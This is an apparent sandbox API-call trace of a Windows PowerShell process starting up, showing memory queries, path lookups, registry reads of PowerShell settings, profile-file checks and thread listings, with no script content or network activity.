	[0304.366] VirtualQuery (in: lpAddress=0x12b9d0, lpBuffer=0x12c890, dwLength=0x30 | out: lpBuffer=0x12c890*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.366] VirtualQuery (in: lpAddress=0x12b9d0, lpBuffer=0x12c890, dwLength=0x30 | out: lpBuffer=0x12c890*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.366] VirtualQuery (in: lpAddress=0x12b9d0, lpBuffer=0x12c890, dwLength=0x30 | out: lpBuffer=0x12c890*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.366] VirtualQuery (in: lpAddress=0x12b9d0, lpBuffer=0x12c890, dwLength=0x30 | out: lpBuffer=0x12c890*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.366] VirtualQuery (in: lpAddress=0x12b9d0, lpBuffer=0x12c890, dwLength=0x30 | out: lpBuffer=0x12c890*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.366] VirtualQuery (in: lpAddress=0x12b9d0, lpBuffer=0x12c890, dwLength=0x30 | out: lpBuffer=0x12c890*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.366] VirtualQuery (in: lpAddress=0x12b9d0, lpBuffer=0x12c890, dwLength=0x30 | out: lpBuffer=0x12c890*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.366] VirtualQuery (in: lpAddress=0x12b9d0, lpBuffer=0x12c890, dwLength=0x30 | out: lpBuffer=0x12c890*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.366] VirtualQuery (in: lpAddress=0x12b9d0, lpBuffer=0x12c890, dwLength=0x30 | out: lpBuffer=0x12c890*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.366] VirtualQuery (in: lpAddress=0x12b9d0, lpBuffer=0x12c890, dwLength=0x30 | out: lpBuffer=0x12c890*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.366] VirtualQuery (in: lpAddress=0x12b9d0, lpBuffer=0x12c890, dwLength=0x30 | out: lpBuffer=0x12c890*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.367] VirtualQuery (in: lpAddress=0x12b9d0, lpBuffer=0x12c890, dwLength=0x30 | out: lpBuffer=0x12c890*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.367] VirtualQuery (in: lpAddress=0x12b9d0, lpBuffer=0x12c890, dwLength=0x30 | out: lpBuffer=0x12c890*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.367] VirtualQuery (in: lpAddress=0x12b9d0, lpBuffer=0x12c890, dwLength=0x30 | out: lpBuffer=0x12c890*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.367] VirtualQuery (in: lpAddress=0x12b9d0, lpBuffer=0x12c890, dwLength=0x30 | out: lpBuffer=0x12c890*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.367] VirtualQuery (in: lpAddress=0x12b9d0, lpBuffer=0x12c890, dwLength=0x30 | out: lpBuffer=0x12c890*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.367] VirtualQuery (in: lpAddress=0x12b9d0, lpBuffer=0x12c890, dwLength=0x30 | out: lpBuffer=0x12c890*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.367] VirtualQuery (in: lpAddress=0x12b9d0, lpBuffer=0x12c890, dwLength=0x30 | out: lpBuffer=0x12c890*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.367] VirtualQuery (in: lpAddress=0x12b9d0, lpBuffer=0x12c890, dwLength=0x30 | out: lpBuffer=0x12c890*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.367] VirtualQuery (in: lpAddress=0x12b9d0, lpBuffer=0x12c890, dwLength=0x30 | out: lpBuffer=0x12c890*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.367] VirtualQuery (in: lpAddress=0x12b9d0, lpBuffer=0x12c890, dwLength=0x30 | out: lpBuffer=0x12c890*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.367] VirtualQuery (in: lpAddress=0x12b9d0, lpBuffer=0x12c890, dwLength=0x30 | out: lpBuffer=0x12c890*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.367] VirtualQuery (in: lpAddress=0x12b9d0, lpBuffer=0x12c890, dwLength=0x30 | out: lpBuffer=0x12c890*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.368] VirtualQuery (in: lpAddress=0x12b9d0, lpBuffer=0x12c890, dwLength=0x30 | out: lpBuffer=0x12c890*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.368] VirtualQuery (in: lpAddress=0x12b9d0, lpBuffer=0x12c890, dwLength=0x30 | out: lpBuffer=0x12c890*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.368] VirtualQuery (in: lpAddress=0x12b9d0, lpBuffer=0x12c890, dwLength=0x30 | out: lpBuffer=0x12c890*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.368] VirtualQuery (in: lpAddress=0x12b9d0, lpBuffer=0x12c890, dwLength=0x30 | out: lpBuffer=0x12c890*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.368] VirtualQuery (in: lpAddress=0x12b9d0, lpBuffer=0x12c890, dwLength=0x30 | out: lpBuffer=0x12c890*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.368] VirtualQuery (in: lpAddress=0x12b9d0, lpBuffer=0x12c890, dwLength=0x30 | out: lpBuffer=0x12c890*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.371] CoTaskMemAlloc (cb=0x104) returned 0x389b60
	[0304.371] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389b60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0304.371] CoTaskMemFree (pv=0x389b60) 
	[0304.374] CoTaskMemAlloc (cb=0x104) returned 0x389b60
	[0304.374] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389b60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0304.374] CoTaskMemFree (pv=0x389b60) 
	[0304.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0306.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0306.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0306.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0306.407] VirtualQuery (in: lpAddress=0x12bc80, lpBuffer=0x12cb40, dwLength=0x30 | out: lpBuffer=0x12cb40*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0306.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0306.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0306.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0306.408] VirtualQuery (in: lpAddress=0x12bc80, lpBuffer=0x12cb40, dwLength=0x30 | out: lpBuffer=0x12cb40*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0306.408] VirtualQuery (in: lpAddress=0x12b4d0, lpBuffer=0x12c390, dwLength=0x30 | out: lpBuffer=0x12c390*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0306.408] VirtualQuery (in: lpAddress=0x12b4d0, lpBuffer=0x12c390, dwLength=0x30 | out: lpBuffer=0x12c390*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0306.409] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12dad8 | out: phkResult=0x12dad8*=0x3a0) returned 0x0
	[0306.409] RegQueryValueExW (in: hKey=0x3a0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12da5c, lpData=0x0, lpcbData=0x12da58*=0x0 | out: lpType=0x12da5c*=0x1, lpData=0x0, lpcbData=0x12da58*=0x56) returned 0x0
	[0306.409] CoTaskMemAlloc (cb=0x5a) returned 0x1b924c60
	[0306.409] RegQueryValueExW (in: hKey=0x3a0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12da2c, lpData=0x1b924c60, lpcbData=0x12da28*=0x56 | out: lpType=0x12da2c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12da28*=0x56) returned 0x0
	[0306.409] CoTaskMemFree (pv=0x1b924c60) 
	[0306.410] RegCloseKey (hKey=0x3a0) returned 0x0
	[0306.410] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12dad8 | out: phkResult=0x12dad8*=0x3a0) returned 0x0
	[0306.410] RegQueryValueExW (in: hKey=0x3a0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12da5c, lpData=0x0, lpcbData=0x12da58*=0x0 | out: lpType=0x12da5c*=0x1, lpData=0x0, lpcbData=0x12da58*=0x56) returned 0x0
	[0306.410] CoTaskMemAlloc (cb=0x5a) returned 0x1b924c60
	[0306.410] RegQueryValueExW (in: hKey=0x3a0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12da2c, lpData=0x1b924c60, lpcbData=0x12da28*=0x56 | out: lpType=0x12da2c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12da28*=0x56) returned 0x0
	[0306.410] CoTaskMemFree (pv=0x1b924c60) 
	[0306.410] RegCloseKey (hKey=0x3a0) returned 0x0
	[0306.410] CoTaskMemAlloc (cb=0x20c) returned 0x1b8fb970
	[0306.410] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b8fb970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0306.411] CoTaskMemFree (pv=0x1b8fb970) 
	[0306.411] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x12d690, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0306.411] CoTaskMemAlloc (cb=0x20c) returned 0x1b8fb970
	[0306.411] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b8fb970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0306.411] CoTaskMemFree (pv=0x1b8fb970) 
	[0306.411] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x12d690, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0306.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x12d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0306.412] SetErrorMode (uMode=0x1) returned 0x1
	[0306.412] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12da40 | out: lpFileInformation=0x12da40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0306.412] SetErrorMode (uMode=0x1) returned 0x1
	[0306.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x12d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0306.412] SetErrorMode (uMode=0x1) returned 0x1
	[0306.412] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12da40 | out: lpFileInformation=0x12da40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0306.412] SetErrorMode (uMode=0x1) returned 0x1
	[0306.412] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x12d830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0306.412] SetErrorMode (uMode=0x1) returned 0x1
	[0306.413] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12da40 | out: lpFileInformation=0x12da40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0306.413] SetErrorMode (uMode=0x1) returned 0x1
	[0306.413] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x12d830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0306.413] SetErrorMode (uMode=0x1) returned 0x1
	[0306.413] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12da40 | out: lpFileInformation=0x12da40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0306.413] SetErrorMode (uMode=0x1) returned 0x1
	[0306.414] CoTaskMemAlloc (cb=0x104) returned 0x389b60
	[0306.414] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389b60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0306.414] CoTaskMemFree (pv=0x389b60) 
	[0306.414] CoTaskMemAlloc (cb=0x104) returned 0x389b60
	[0306.414] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389b60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0306.414] CoTaskMemFree (pv=0x389b60) 
	[0306.415] CoTaskMemAlloc (cb=0x104) returned 0x389b60
	[0306.415] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389b60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0306.415] CoTaskMemFree (pv=0x389b60) 
	[0306.415] CoTaskMemAlloc (cb=0x104) returned 0x389b60
	[0306.415] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389b60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0306.415] CoTaskMemFree (pv=0x389b60) 
	[0306.416] CoTaskMemAlloc (cb=0x104) returned 0x389b60
	[0306.416] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389b60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0306.416] CoTaskMemFree (pv=0x389b60) 
	[0306.416] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3a0
	[0306.417] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x390
	[0306.417] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1d0
	[0306.417] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x304
	[0306.417] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x30c
	[0306.417] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x320
	[0306.417] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x328
	[0306.417] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x32c
	[0306.417] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x330
	[0306.417] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x334
	[0306.417] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x338
	[0306.417] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x33c
	[0306.418] CoTaskMemAlloc (cb=0x104) returned 0x389b60
	[0306.418] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389b60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0306.418] CoTaskMemFree (pv=0x389b60) 
	[0306.420] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0306.420] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x12dc20 | out: lpMode=0x12dc20) returned 1
	[0306.421] CoTaskMemAlloc (cb=0x104) returned 0x389b60
	[0306.421] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389b60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0306.421] CoTaskMemFree (pv=0x389b60) 
	[0306.423] SetEvent (hEvent=0x304) returned 1
	[0306.423] SetEvent (hEvent=0x3a0) returned 1
	[0306.423] SetEvent (hEvent=0x390) returned 1
	[0306.423] SetEvent (hEvent=0x1d0) returned 1
	[0306.424] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x394
	[0306.426] CoTaskMemAlloc (cb=0x104) returned 0x389b60
	[0306.426] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389b60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0306.426] CoTaskMemFree (pv=0x389b60) 
	[0306.427] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d978 | out: phkResult=0x12d978*=0x398) returned 0x0
	[0306.427] RegQueryValueExW (in: hKey=0x398, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x12d8fc, lpData=0x0, lpcbData=0x12d8f8*=0x0 | out: lpType=0x12d8fc*=0x0, lpData=0x0, lpcbData=0x12d8f8*=0x0) returned 0x2

Thread:
	id = 75
	os_tid = 0xa1c


Thread:
	id = 79
	os_tid = 0x994


Thread:
	id = 81
	os_tid = 0xa18


Thread:
	id = 85
	os_tid = 0x9d8


Thread:
	id = 95
	os_tid = 0x9e4


Thread:
	id = 96
	os_tid = 0x894

	[0247.553] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0279.103] CloseHandle (hObject=0x320) returned 1
	[0279.104] CloseHandle (hObject=0x13) returned 1
	[0279.104] CloseHandle (hObject=0xf) returned 1
	[0279.105] RegCloseKey (hKey=0x30c) returned 0x0
	[0279.105] RegCloseKey (hKey=0x308) returned 0x0
	[0279.105] RegCloseKey (hKey=0x304) returned 0x0
	[0279.105] LocalFree (hMem=0x2d7290) returned 0x0
